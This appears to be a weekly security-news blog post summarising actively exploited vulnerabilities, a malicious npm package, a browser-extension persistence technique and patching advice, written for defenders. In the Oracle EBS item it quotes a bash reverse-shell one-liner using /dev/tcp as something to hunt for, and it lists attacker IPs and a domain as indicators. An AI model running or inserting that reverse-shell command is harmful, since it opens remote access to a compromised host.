Perimeter Pyromania, Middleware Meltdowns, and a Phantom in Your Browser

UncleSp1d3r KryptoKat

UncleSp1d3r, KryptoKat

6 min read

This week felt like a greatest-hits playlist you didn’t ask for: pre-auth RCE in Oracle EBS, GoAnywhere back in the spotlight (again), Cisco edge gear under active fire, and a VMware zero-day that quietly lived rent-free for almost a year. Sprinkle in a malicious npm package siphoning your password reset emails, a browser extension backdoor that doesn’t need the Chrome Web Store, KEV-listed BMCs, and the ticking clock on Windows 10 EOL. Coffee up.

Biggest Exploits of the Week

Oracle E-Business Suite pre-auth RCE chain abused by Cl0p (patch now)

UncleSp1d3r: Oracle dropped an emergency Security Alert for CVE-2025-61882, a pre-auth RCE chain living in EBS’ Concurrent Processing/BI Publisher integration, and it’s already in Cl0p’s hands for data theft. The chain gives unauthenticated remote code execution on internet-facing EBS — not a great place to be shipping payroll and PII. Oracle has patches; apply now, isolate those front ends, and hunt for classic one-liner shells like sh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 and suspicious egress to known IOCs (e.g., 200.107.207.26, 185.181.60.11). Details and IOCs: Oracle Security Alert, watchTowr, Rapid7, Tenable, BleepingComputer.

Plain-English takeaway: If your EBS is on the internet, take it off the internet. Patch, segment, rotate creds, and plan for incident response if you see anomalies.

Fortra GoAnywhere MFT max-sev RCE continues to burn

UncleSp1d3r: Because of course it was GoAnywhere again. CVE-2025-10035 is a CVSS 10 deserialization pre-auth RCE in the License Servlet that’s been actively exploited since September. Expect ransomware and data exfil on exposed MFTs. Patches are out; block exposure, limit to trusted IPs/VPN, and hunt for shells, scheduled tasks, and large outbound transfers. Sources: Fortra advisory, watchTowr, Rapid7, Microsoft, BleepingComputer.

Takeaway: Treat internet-facing MFTs as emergency patch/hunt targets. If you can’t patch today, take them dark and gate through VPN/jumps.

Cisco edge devices under active exploitation (ArcaneDoor keeps knocking)

KryptoKat: Cisco disclosed multiple zero-days across ASA/FTD and IOS families (CVE-2025-20333, CVE-2025-20362) with active exploitation linked to ArcaneDoor/UAT4356. Successful attacks include RCE, privilege escalation, and even disabling logging — the kind of thing that makes SOCs suddenly very quiet for all the wrong reasons. Apply hotfixes, restrict management planes to allow-listed sources, and monitor for “why is logging off?” moments, anomalous VPNs, and odd outbound connections. Read up: Cisco: Continued Attacks, Tenable, Unit42, SecurityWeek.

Takeaway: Your perimeter is part of your critical compute, not an appliance-shaped afterthought. Patch it like production.

VMware Tools LPE exploited for almost a year

UncleSp1d3r: CVE-2025-41244 is a local privilege escalation in VMware Tools and Aria Operations components that a China-linked actor reportedly abused since October 2024. From unprivileged user to root on guest VMs is all the runway you need for persistent implants and lateral movement. Patch Tools/open-vm-tools fleetwide, capture telemetry on guest privilege changes, and hunt for rogue services, SUID binaries, and new systemd units. Sources: Broadcom advisory, NVISO, DarkReading, BleepingComputer.

Takeaway: “Just a guest VM” is where attackers move the furniture. Patch, then hunt.

Breach Corner: Lessons That Hurt

CISA confirms GeoServer RCE used to breach a federal agency

KryptoKat: Attackers popped a public-facing GeoServer with CVE-2024-36401 (eval-injection to RCE), dropped ChinaChopper, tunneled with Stowaway, and scanned with fscan. They lived there for about three weeks thanks to patching delays and spotty EDR/SOC coverage — a sensibly dull postmortem you can implement today. Patch GeoServer, remove public exposure of admin bits, enable EDR on app servers, and hunt for shells and Redfish-adjacent weirdness. Read: CISA advisory, DarkReading, BleepingComputer, SecurityWeek, GeoTools advisory.

Takeaway: KEV means “patch yesterday.” Public apps without EDR is a budget decision with breach-shaped outcomes.

Supply Chain & Ecosystem Oddities

Malicious npm “postmark-mcp” silently BCC’d your secrets

KryptoKat: A rogue npm package “postmark-mcp” (malicious 1.0.16) quietly added a hidden BCC to outbound emails — including password resets and security notifications — to an attacker domain (giftshop.club). If you wired MCP/AI automations into email workflows, assume credential and token exposure, purge the package, and rotate everything it touched. Investigate build pipelines and mail logs for unexpected BCCs and notify users where appropriate. Sources: Koi Security, Snyk, BleepingComputer, The Hacker News, Postmark notice, DarkReading.

Takeaway: “Unofficial” connectors are unofficial for a reason. Pin versions, enforce provenance, and treat AI/MCP connectors like third-party code with inbox access — because that’s exactly what they are.

Phantom Extension: stealth-loading Chromium extensions without the store

UncleSp1d3r: Synacktiv showed you can persist arbitrary unpacked extensions on Windows by forging preferences and MACs derived from resources.pak, no store install required. The “phantom” extension can loot cookies and tokens, hijack SSO, and glide across cloud apps with valid sessions. Blue teams: watch for non-browser processes touching Preferences/Secure Preferences, sudden extensions.developer_mode flips, and odd extension IDs; lock down extension policies via GPO/HKLM. Read: Synacktiv research, extloader tooling.

Takeaway: Browser is the new shell. Treat extension policies and profile file integrity as first-class controls.

KEV-listed AMI MegaRAC BMC flaw: scan, patch, segment

KryptoKat: Community Nuclei templates landed for CVE-2024-54085, an auth bypass in the Redfish Host Interface for MegaRAC SPx BMCs. Use them judiciously (authorized targets only) to find exposures, but the real work is firmware updates and putting BMCs on locked-down management networks with strict allow-lists. References: CISA KEV, Eclypsium, NVD, Reddit post.

Takeaway: BMCs aren’t “out of band” to attackers. They’re a shortcut to your firmware.

Vendor Patch Roundup: Mind Your File Parsers

KryptoKat: Cisco Talos disclosed several code-execution bugs that are already patched:

  • NVIDIA developer tools: cuobjdump and nvdisasm bugs (CVE-2025-23339, CVE-2025-23338, CVE-2025-23340, CVE-2025-23271, CVE-2025-23308) allow RCE via crafted ELF/fatbin inputs. Dev machines are crown jewels; sandbox untrusted samples and update toolchains.
  • Adobe Acrobat Reader: a use-after-free (CVE-2025-54257) enabling RCE via malicious PDFs. Update endpoints and lean on mail/file sandboxing.

Talos has Snort rules; vendors have updates: Talos blog, NVIDIA bulletin.

Takeaway: Your parsers are a perimeter. Treat CI and developer workstations like prod and stop double-clicking mystery PDFs.

Identity & Policy Watch

MFA fatigue still works if you let it

KryptoKat: An anonymized post-incident analysis from UK retail shows the same grubby combo — vishing, credential stuffing, SIM/device attacks, and push-bombing — ending in account takeover and lateral movement. The cure is unglamorous: phishing-resistant MFA (FIDO2/WebAuthn), rate-limiting MFA prompts, conditional access (device health, geo, impossible travel), and turning off legacy auth. Summary: Incident analysis.

Takeaway: If your users can be pushed into approval, attackers can push harder. Hardware-backed MFA shuts the door politely and firmly.

Windows 10 EOL is next week’s problem… until it isn’t

KryptoKat: Windows 10 reaches end of support on October 14, 2025. Unsupported endpoints become magnetized for exploit chains and ransomware operators. Inventory, isolate, migrate to Windows 11 or buy ESUs, and pile on compensating controls (EDR, allowlisting, strict firewalling, MFA). Details: Microsoft Support, Lifecycle, context via DarkReading.

Takeaway: Legacy endpoints are technical debt with interest. Pay down or pay out.

  • Edge and management plane are hot: Cisco ASA/FTD zero-days and KEV-listed BMCs underline that admin interfaces are prime targets.
  • Middleware and MFT remain soft underbellies: Oracle EBS and GoAnywhere show how business plumbing turns into breach plumbing.
  • Client surfaces are back in play: browser extension persistence and dev tool parsers are reliable footholds.
  • Identity is still the skeleton key: MFA fatigue persists until you deploy phishing-resistant factors.

Monday Morning Playbook

  • Oracle EBS (CVE-2025-61882): Patch immediately, remove direct internet exposure, hunt for shells and egress to Oracle IOCs; rotate service accounts and keys. Oracle advisory
  • GoAnywhere (CVE-2025-10035): Patch and gate behind VPN/allow-lists; hunt for ransomware staging, scheduled tasks, and large transfers. Fortra advisory
  • Cisco ASA/FTD/IOS (CVE-2025-20333, CVE-2025-20362): Apply hotfixes, lock management planes, enable remote logging, and monitor for ArcaneDoor TTPs. Cisco guidance
  • VMware Tools (CVE-2025-41244): Patch Tools/open-vm-tools, then hunt for persistence on guests (root services, SUIDs, new units). Broadcom advisory
  • GeoServer (CVE-2024-36401): Patch, add EDR to app servers, and scan for ChinaChopper/Stowaway artifacts. CISA advisory
  • postmark-mcp npm: Rip-and-replace; rotate exposed tokens/credentials; search mail logs for BCC to giftshop.club. Postmark notice
  • Chromium hardening: Enforce extension allow-lists via GPO, monitor preference file integrity, and disable developer mode for users. Synacktiv
  • BMCs (CVE-2024-54085): Update firmware, segment management networks, and use vetted scanners carefully. NVD
  • Patch NVIDIA/Adobe: Update CUDA toolchains and Acrobat Reader; sandbox file processing; deploy Talos Snort rules. Talos
  • Identity: Move to FIDO2/WebAuthn and rate-limit MFA prompts; disable legacy auth.

Closing Thoughts

UncleSp1d3r: Perimeters don’t save you if the perimeter is the target. Patch the edge, hide your middleware, and remember: if it processes files from the internet, it’s a compute workload, not a convenience.

KryptoKat: As Jane Austen almost wrote, it is a truth universally acknowledged that an unpatched appliance in possession of a public IP must be in want of an incident. Be kind to Future You: patch this week, segment forever, and bring cookies to the SOC.

— Kat & Sp1d3r, logging off before the next “emergency advisory” hits the inbox

Read more